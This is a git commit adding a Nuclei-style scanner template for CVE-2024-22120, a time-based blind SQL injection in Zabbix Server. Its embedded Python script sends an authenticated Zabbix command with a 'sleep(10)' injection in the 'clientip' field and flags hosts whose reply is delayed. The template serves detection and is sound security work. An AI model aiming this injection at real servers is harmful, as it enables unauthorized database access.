Create CVE-2024-22120.yaml
parent
e0f7bb4632
commit
a1e77eded0
|
@ -0,0 +1,56 @@
|
||||||
|
id: CVE-2024-22120
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Zabbix Server - Time-Based Blind SQL injection
|
||||||
|
author: CodeStuffBreakThings
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The Zabbix server can execute commands for configured scripts. After executing a command, an audit entry is added to the "Audit Log". Due to the "clientip" field not being sanitized, it is possible to inject SQL into "clientip" and exploit a time-based blind SQL injection vulnerability.
|
||||||
|
remediation: |
|
||||||
|
Fixed in versions 6.0.28rc1, 6.4.13rc1, 7.0.0beta2
|
||||||
|
reference:
|
||||||
|
- https://support.zabbix.com/browse/ZBX-24505#/
|
||||||
|
- https://github.com/W01fh4cker/CVE-2024-22120-RCE
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-22120
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.1
|
||||||
|
cve-id: CVE-2024-22120
|
||||||
|
tags: zabbix,sqli,cve,cve2024,authenticated
|
||||||
|
|
||||||
|
variables:
|
||||||
|
HOST: "{{Host}}"
|
||||||
|
PORT: "{{Port}}"
|
||||||
|
SID: "{{SID}}"
|
||||||
|
HOSTID: "{{HOSTID}}"
|
||||||
|
|
||||||
|
code:
|
||||||
|
- engine:
|
||||||
|
- py
|
||||||
|
- python3
|
||||||
|
source: |
|
||||||
|
import os, struct, socket
|
||||||
|
from datetime import datetime
|
||||||
|
hostname=os.getenv('HOST')
|
||||||
|
port=int(os.getenv('PORT'))
|
||||||
|
sid=os.getenv('SID')
|
||||||
|
hostid=os.getenv('HOSTID')
|
||||||
|
zbx_header = "ZBXD\x01".encode()
|
||||||
|
message_json = "{\"request\": \"command\", \"sid\": \"" + sid + "\", \"scriptid\": \"3\", \"clientip\": \"' + (select sleep(10)) + '\", \"hostid\": \"" + hostid + "\"}"
|
||||||
|
message_length = struct.pack('<q', len(message_json))
|
||||||
|
message = zbx_header + message_length + message_json.encode()
|
||||||
|
before_query = datetime.now().timestamp()
|
||||||
|
s = socket.socket()
|
||||||
|
s.connect((hostname,port))
|
||||||
|
s.send(message)
|
||||||
|
response = s.recv(1024)
|
||||||
|
s.close()
|
||||||
|
after_query = datetime.now().timestamp()
|
||||||
|
responsetime = after_query - before_query
|
||||||
|
if responsetime >= 10 and zbx_header in response:
|
||||||
|
print("Vulnerable to CVE-2024-22120")
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Vulnerable to CVE-2024-22120"
|
Loading…
Reference in New Issue